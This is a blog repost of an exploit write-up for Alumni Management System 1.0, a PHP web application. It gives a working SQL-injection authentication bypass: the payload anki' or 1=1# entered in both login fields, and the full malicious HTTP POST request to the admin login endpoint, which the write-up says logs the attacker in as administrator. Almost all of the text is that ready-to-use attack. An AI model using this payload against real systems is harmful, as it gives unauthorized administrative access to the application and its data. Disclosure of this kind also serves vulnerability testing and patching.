Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    86381169

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

#Exploit Title: Alumni Management System 1.0 - Authentication Bypass
#Date: 2020-10-16
#Exploit Author: Ankita Pal
#Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/alumni-management-system.zip
#Version: V1.0
#Tested on: Windows 10 + xampp v3.2.4


Proof of Concept:::

Step 1:	Open the URL http://localhost:8081/alumni-management-system/alumni/admin/login.php 

Step 2:	use payload anki' or 1=1# for both username and password.


Malicious Request:::

POST /alumni-management-system/alumni/admin/ajax.php?action=login HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 53
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/alumni-management-system/alumni/admin/login.php
Cookie: PHPSESSID=infdfigld4et4jndfgbn33kcsv

username=anki'+or+1%3D1%23&password=anki'+or+1%3D1%23

You will be login as admin of the application.